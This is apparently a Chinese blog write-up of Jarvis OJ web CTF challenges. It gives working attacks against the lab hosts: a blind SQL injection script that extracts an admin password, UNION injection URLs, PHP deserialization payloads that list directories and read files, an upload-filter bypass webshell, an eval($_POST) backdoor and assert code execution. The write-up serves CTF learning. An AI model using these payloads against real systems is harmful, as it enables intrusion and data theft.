jarvis oj(web wp)
api调用
这题是slim架构的xxe漏洞,看博客做题2333
https://www.leavesongs.com/PENETRATION/slim3-xxe.html
simple injection
username和password是注入点,然后就是确认怎么注入了
题目是过滤了空格的,但是可以用/**/绕过
确认存在admin表
username=admin'/**/or/**/exists(select/**/*/**/from/**/admin)#&password=1'#
存在username和password字段
username=admin'/**/or/**/exists(select/**/username,password/**/from/**/admin)#&password=1'#
确定只有一条记录
username=admin'/**/or/**/exists(select/**/count(*)/**/from/**/admin)#&password=1'#
确定密码长度
username=user'/**/or/**/(select/**/length(password)/**/from/**/admin)=32#&password=1'#
剩下的就是盲注了,贴个脚本
#coding:utf-8
import requests
url = "http://web.jarvisoj.com:32787/login.php"
str = "密码错误"
chars = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
print('start!')
password = ""
for i in range(1,33):
for j in chars:
data = {'username':"user'/**/or/**/mid((select/**/password/**/from/**/admin),%s,1)='%s'#"%(i,j),'password':"1'#"}
res = requests.post(url,data=data).text
if str in res:
password += j
print(password)
break
print(password)
print('end!')结果
这个明显是md5加密后的,去解密然后再明文登录就行了
WEB?
这题看前端的js代码可以看到验证规则
$.post("checkpass.json",t,
function(t){
self.checkpass(e)?
self.setState({
errmsg:"Success!!",
errcolor:b.green400
}):(self.setState({
errmsg:"Wrong Password!!",
errcolor:b.red400
})
})然后他的checkpass函数是这样的
function(e){
if(25!==e.length)
return !1;
for(var t=[],n=0;n<25;n++)
t.push(e.charCodeAt(n));
for(var r=[325799,309234,317320,327895,298316,301249,330242,289290,273446,337687,258725,267444,373557,322237,344478,362136,331815,315157,299242,305418,313569,269307,338319,306491,351259],o=[[11,13,32,234,236,3,72,237,122,230,157,53,7,225,193,76,142,166,11,196,194,187,152,132,135],[76,55,38,70,98,244,201,125,182,123,47,86,67,19,145,12,138,149,83,178,255,122,238,187,221],[218,233,17,56,151,28,150,196,79,11,150,128,52,228,189,107,219,87,90,221,45,201,14,106,230],[30,50,76,94,172,61,229,109,216,12,181,231,174,236,159,128,245,52,43,11,207,145,241,196,80],[134,145,36,255,13,239,212,135,85,194,200,50,170,78,51,10,232,132,60,122,117,74,117,250,45],[142,221,121,56,56,120,113,143,77,190,195,133,236,111,144,65,172,74,160,1,143,242,96,70,107],[229,79,167,88,165,38,108,27,75,240,116,178,165,206,156,193,86,57,148,187,161,55,134,24,249],[235,175,235,169,73,125,114,6,142,162,228,157,160,66,28,167,63,41,182,55,189,56,102,31,158],[37,190,169,116,172,66,9,229,188,63,138,111,245,133,22,87,25,26,106,82,211,252,57,66,98],[199,48,58,221,162,57,111,70,227,126,43,143,225,85,224,141,232,141,5,233,69,70,204,155,141],[212,83,219,55,132,5,153,11,0,89,134,201,255,101,22,98,215,139,0,78,165,0,126,48,119],[194,156,10,212,237,112,17,158,225,227,152,121,56,10,238,74,76,66,80,31,73,10,180,45,94],[110,231,82,180,109,209,239,163,30,160,60,190,97,256,141,199,3,30,235,73,225,244,141,123,208],[220,248,136,245,123,82,120,65,68,136,151,173,104,107,172,148,54,218,42,233,57,115,5,50,196],[190,34,140,52,160,34,201,48,214,33,219,183,224,237,157,245,1,134,13,99,212,230,243,236,40],[144,246,73,161,134,112,146,212,121,43,41,174,146,78,235,202,200,90,254,216,113,25,114,232,123],[158,85,116,97,145,21,105,2,256,69,21,152,155,88,11,232,146,238,170,123,135,150,161,249,236],[251,96,103,188,188,8,33,39,237,63,230,128,166,130,141,112,254,234,113,250,1,89,0,135,119],[192,206,73,92,174,130,164,95,21,153,82,254,20,133,56,7,163,48,7,206,51,204,136,180,196],[106,63,252,202,153,6,193,146,88,118,78,58,214,168,68,128,68,35,245,144,102,20,194,207,66],[154,98,219,2,13,65,131,185,27,162,214,63,238,248,38,129,170,180,181,96,165,78,121,55,214],[193,94,107,45,83,56,2,41,58,169,120,58,105,178,58,217,18,93,212,74,18,217,219,89,212],[164,228,5,133,175,164,37,176,94,232,82,0,47,212,107,111,97,153,119,85,147,256,130,248,235],[221,178,50,49,39,215,200,188,105,101,172,133,28,88,83,32,45,13,215,204,141,226,118,233,156],[236,142,87,152,97,134,54,239,49,220,233,216,13,143,145,112,217,194,114,221,150,51,136,31,198]],n=0;n<25;n++){
for(var i=0,a=0;a<25;a++)
i+=t[a]*o[n][a];
if(i!==r[n])
return !1
}
return!0}
}
就是要解一个25元的方程组,用脚本帮忙算
import np
r=[325799,309234,317320,327895,298316,301249,330242,289290,273446,337687,258725,267444,373557,322237,344478,362136,331815,315157,299242,305418,313569,269307,338319,306491,351259]
o=[[11,13,32,234,236,3,72,237,122,230,157,53,7,225,193,76,142,166,11,196,194,187,152,132,135],[76,55,38,70,98,244,201,125,182,123,47,86,67,19,145,12,138,149,83,178,255,122,238,187,221],[218,233,17,56,151,28,150,196,79,11,150,128,52,228,189,107,219,87,90,221,45,201,14,106,230],[30,50,76,94,172,61,229,109,216,12,181,231,174,236,159,128,245,52,43,11,207,145,241,196,80],[134,145,36,255,13,239,212,135,85,194,200,50,170,78,51,10,232,132,60,122,117,74,117,250,45],[142,221,121,56,56,120,113,143,77,190,195,133,236,111,144,65,172,74,160,1,143,242,96,70,107],[229,79,167,88,165,38,108,27,75,240,116,178,165,206,156,193,86,57,148,187,161,55,134,24,249],[235,175,235,169,73,125,114,6,142,162,228,157,160,66,28,167,63,41,182,55,189,56,102,31,158],[37,190,169,116,172,66,9,229,188,63,138,111,245,133,22,87,25,26,106,82,211,252,57,66,98],[199,48,58,221,162,57,111,70,227,126,43,143,225,85,224,141,232,141,5,233,69,70,204,155,141],[212,83,219,55,132,5,153,11,0,89,134,201,255,101,22,98,215,139,0,78,165,0,126,48,119],[194,156,10,212,237,112,17,158,225,227,152,121,56,10,238,74,76,66,80,31,73,10,180,45,94],[110,231,82,180,109,209,239,163,30,160,60,190,97,256,141,199,3,30,235,73,225,244,141,123,208],[220,248,136,245,123,82,120,65,68,136,151,173,104,107,172,148,54,218,42,233,57,115,5,50,196],[190,34,140,52,160,34,201,48,214,33,219,183,224,237,157,245,1,134,13,99,212,230,243,236,40],[144,246,73,161,134,112,146,212,121,43,41,174,146,78,235,202,200,90,254,216,113,25,114,232,123],[158,85,116,97,145,21,105,2,256,69,21,152,155,88,11,232,146,238,170,123,135,150,161,249,236],[251,96,103,188,188,8,33,39,237,63,230,128,166,130,141,112,254,234,113,250,1,89,0,135,119],[192,206,73,92,174,130,164,95,21,153,82,254,20,133,56,7,163,48,7,206,51,204,136,180,196],[106,63,252,202,153,6,193,146,88,118,78,58,214,168,68,128,68,35,245,144,102,20,194,207,66],[154,98,219,2,13,65,131,185,27,162,214,63,238,248,38,129,170,180,181,96,165,78,121,55,214],[193,94,107,45,83,56,2,41,58,169,120,58,105,178,58,217,18,93,212,74,18,217,219,89,212],[164,228,5,133,175,164,37,176,94,232,82,0,47,212,107,111,97,153,119,85,147,256,130,248,235],[221,178,50,49,39,215,200,188,105,101,172,133,28,88,83,32,45,13,215,204,141,226,118,233,156],[236,142,87,152,97,134,54,239,49,220,233,216,13,143,145,112,217,194,114,221,150,51,136,31,198]]
o = np.array(o)
r = np.array(r)
x = np.linalg.solve(o,r)
# print(x)
string = ''
for i in x:
i += 0.5
# print(round(i,0))
string += chr(int(i))
print(string)这里我是将最后算出来的值对应成ascii码转出来就能得到flag了
神盾局的秘密
这题进去会看见一个图片,然后也会发现url的参数是一个base64,解密出来是shield.jpg
猜测是文件读取
试下index.php进行base64加密然后传过去,可以看到index.php的代码
同理,其他的代码也可以顺着找过去
index.php
<?php
require_once('shield.php');
$x = new Shield();
isset($_GET['class']) && $g = $_GET['class'];
if (!empty($g)) {
$x = unserialize($g);
}
echo $x->readfile();
?>
//对得到的值进行反序列化
shield.php
<?php
//flag is in pctf.php
class Shield {
public $file;
function __construct($filename = '') {
$this -> file = $filename;
}
function readfile() {
if (!empty($this->file) && stripos($this->file,'..')===FALSE
&& stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
return @file_get_contents($this->file);
}
}
}
?>
//过滤.. / \\
//将读出来的文件内容放进一个变量
showimg.php
<?php
$f = $_GET['img'];
if (!empty($f)) {
$f = base64_decode($f);
if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE
&& stripos($f,'pctf')===FALSE) {
readfile($f);
} else {
echo "File not found!";
}
}
?>
//过滤.. / \\ pctf可以看到,index.php接了一个class对他进行反序列化然后调用readfile函数并输出值,flag在pctf.php里面,直接从showimg.php去读pctf.php是不可能的了,只能序列化去index.php里去读
最终payload
flag在管理员手里
这题是考哈希长度扩展攻击,哈希长度扩展攻击就不解释了,直接做题,抓包看到role和hsh
再扫一下后台,看到index.php~泄露,恢复文件可以看到
role是cookie传过来的值,hsh是md5加密salt和反转的role后的值,如果role是admin的话,就可以拿到flag
但是salt是什么我们不知道,可是可以用hashpump求出来
这里有篇p神的博客可以参考,写的很详细
https://www.cnblogs.com/pcat/p/5478509.html
得出来的结果也都有了,把md5下面的字符串倒回去改成url加密就行了
in a mess
题目提示看index.phps
<?php
error_reporting(0);
echo "<!--index.phps-->";
if(!$_GET['id'])
{
header('Location: index.php?id=1');
exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
echo 'Hahahahahaha';
return ;
}
$data = @file_get_contents($a,'r');
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
require("flag.txt");
}
else
{
print "work harder!harder!harder!";
}
?>看到我们要输入id,a,b三个值,而且还要满足id=0,a读文件读出来是1122 is a nice lab!,b长度大于5且与1144匹配但是第一位不是4
id输入字符串就能绕过,比如id=0e12,id=abd
a的话,用到了php://input(据说data协议也可以,a=data:,1122 is a nice lab!
b的话,用%00截断,b=%00111111
然后就看到这个,这里开始要进行sql注入,过滤了空格,union,select,from,表名
从图中可以看见有3列,而且一开始尝试id=1'时报错直接报了数据表是content
所以就直接看字段是什么了
然后看context的值
RE?
这题我贼懵圈,udf提权?喵喵喵?
拿到一个udf文件,把他放进去服务器,然后就看help_me函数
Easy Gallery
这题点进去看见一个文件上传的地方,应该就是考文件上传了
然后试了下%00和绕过,都不能上传php文件,猜测应该是图片马
试下在图片后面加<?php phpinfo();?>然后上传再去访问
(这里有个坑,真正能访问到图片的地址是http://web.jarvisoj.com:32785/index.php?page=uploads/图片id+图片类型)
结果出现这个,所以后台是在文件末尾自动加上.php然后就去访问,所以就要用到%00截断
截断以后发现
试了一下发现好像是检测到<?就会触发waf,所以改一下传法
<script language='php'>
phpinfo();
</script>
上传再去访问就能看见了
Chopper
这题服务器应该是挂了,一直访问不了
记录一下别人的做题思路和考点
这题应该是在考代理,点进去看见有张图片和管理员登录,然后点进去看见要用管理员IP103.27.76.153才允许登录
试了下抓包改包什么的都不行
最后发现是代理(还是跨站攻击?
通过原来的网站去访问一个中间的网站,然后中间的网站有比较高的权限,就可以访问其他的原本禁止访问的网站了
然后能看到一个you are closing的网页........
扫后台能看到有robot.txt,里面有两个disallow,一个是*.php,一个*.php.txt
在txt里能看见有一句话木马 "eval($_POST[360])"
最后菜刀连一下就能拿到flag了
phpinfo
这里参考大佬博客https://chybeta.github.io/2017/07/05/jarvisoj-web-writeup/
这题进去能看见源码
这题考到的是反序列化的漏洞,emmm,题目提示很明显
有个OowoO的类,一个可控变量mdzz,两个魔幻函数,很友好,但是怎么才能控制这个类呢
看下phpinfo
session.upload_progress.enabled是on,当一个上传在处理时,post一个与ini中设置的session.upload_progress.name同名变量时,PHP检测到这个post请求,就会在$_SESSION中添加一组数据,所以可以通过session upload progress设置session,然后控制OowoO这个类达到我们的目的
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>phpinfo</title>
</head>
<body>
<form action="http://web.jarvisoj.com:32784/index.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
<input type="file" name="file" />
<input type="submit" value="go" />
</form>
</body>
</html>通过这个网页去抓包改包达到我们的目的,对序列化出来的语句不熟的话可以直接写个脚本echo出来,这里就不贴了(逃
先看当前文件路径,抓包把filename改成|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(dirname(/opt/lampp/htdocs));\";}
加个反斜杠是为了防转义
得到结果
然后扫描目录,filename为|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:38:\"print_r(scandir(\"/opt/lampp/htdocs\"));\";}
可以看到有flag的文件了
最后把他读出来,filename为|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}
flag
inject
这题首先进去第一件事是要找到源码orz
这里是index.php~泄露
<?php
require("config.php");
$table = $_GET['table']?$_GET['table']:"test";
$table = Filter($table);
mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
$sql = "select 'flag{xxx}' from secret_{$table}";
$ret = sql_query($sql);
echo $ret[0];
?>可以看到$table是可以注入的一个点
因为他是反引号括着,所以我们要想办法闭合反引号
查看数据库
?table=test` `union select database() limit 1,1
看表
?table=test` `union select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1
接着是字段,这里有个坑就是后台过滤了双引号,然后就只能一行一行慢慢看
?table=test` `union select column_name from information_schema.columns limit 1,1
最后就能拿到flag了
?table=test` `union select group_concat(flagUwillNeverKnow) from secret_flag limit 1,1
babyphp
这题看到题目有说用到了git,猜测是.git泄露,一扫还真的是
然后就看到了源码
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");
?>这里可以看到源码有个assert函数,这个函数可以将接收到的字符串当做代码执行,而且刚好又有一个$file参数,所以就可以进行代码执行,用下系统函数先去查看目录
看见有个templates目录,其实这个在泄露出来的源码就看到了,继续看templates目录
看到有个flag.php,读取一下
flag已经出来了
register
这题给了提示,但是一直找不到country会影响什么,最后看大佬博客做题2333
https://blog.csdn.net/Ni9htMar3/article/details/73743284#t4
http://mitah.cn/index.php/archives/8/
country会影响时间,然后就是利用时间的不同进行布尔盲注
最后拿到admin的密码进行碰撞登录进去manage页面就能看见flag了
图片上传漏洞
这题考CVE漏洞,太菜了,还是不会,看大佬wp做题
https://www.scanfsec.com/jarvisoj_web_writeup.html#directory056831405803208134
https://www.2cto.com/article/201605/505823.html
看phpinfo能看到有ImageMagick,剩下的就是漏洞利用了
利用exiftool生成一句话木马
然后就是上传了
剩下的就是访问y.php连菜刀了,但是后台好像挂了???一直找不到y.php
babyxss
这题还没弄懂,先把大佬的wp挂一挂,以后弄懂他(ง •̀_•́)ง
https://blog.csdn.net/littlelittlebai/article/details/78922343
下一篇: bugku 代码审计 write up